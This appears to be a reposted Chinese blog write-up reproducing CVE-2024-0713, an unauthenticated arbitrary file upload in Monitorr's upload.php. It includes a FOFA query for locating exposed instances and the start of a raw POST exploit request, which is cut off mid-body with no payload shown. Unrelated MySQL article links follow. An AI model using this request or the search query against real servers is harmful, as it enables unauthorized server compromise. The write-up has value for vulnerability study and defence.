博客
关于我
Monitorr 任意文件上传漏洞复现(CVE-2024-0713)
阅读量:795 次
发布时间:2023-02-09

本文共 547 字,大约阅读时间需要 1 分钟。

0x01 产品简介

Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。

0x02 漏洞概述

Monitorr 1.7.6m 版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。

0x03 复现环境

FOFA:body="assets/php/timestamp.php"

0x04 漏洞复现

Exp

POST /assets/php/upload.php HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q------WebKitFormBoundaryMmx988TUuintqO4QCo

转载地址:http://bpffk.baihongyu.com/

你可能感兴趣的文章
MySQL 报错:Duplicate entry 'xxx' for key 'UNIQ_XXXX'
查看>>
Mysql 拼接多个字段作为查询条件查询方法
查看>>
mysql 排序id_mysql如何按特定id排序
查看>>
Mysql 提示:Communication link failure
查看>>
mysql 插入是否成功_PDO mysql:如何知道插入是否成功
查看>>
Mysql 数据库InnoDB存储引擎中主要组件的刷新清理条件:脏页、RedoLog重做日志、Insert Buffer或ChangeBuffer、Undo Log
查看>>
mysql 数据库中 count(*),count(1),count(列名)区别和效率问题
查看>>
mysql 数据库备份及ibdata1的瘦身
查看>>
MySQL 数据库备份种类以及常用备份工具汇总
查看>>
mysql 数据库存储引擎怎么选择?快来看看性能测试吧
查看>>
MySQL 数据库操作指南:学习如何使用 Python 进行增删改查操作
查看>>
MySQL 数据库的高可用性分析
查看>>
MySQL 数据库设计总结
查看>>
Mysql 数据库重置ID排序
查看>>
Mysql 数据类型一日期
查看>>
MySQL 数据类型和属性
查看>>
mysql 敲错命令 想取消怎么办?
查看>>
Mysql 整形列的字节与存储范围
查看>>
mysql 断电数据损坏,无法启动
查看>>
MySQL 日期时间类型的选择
查看>>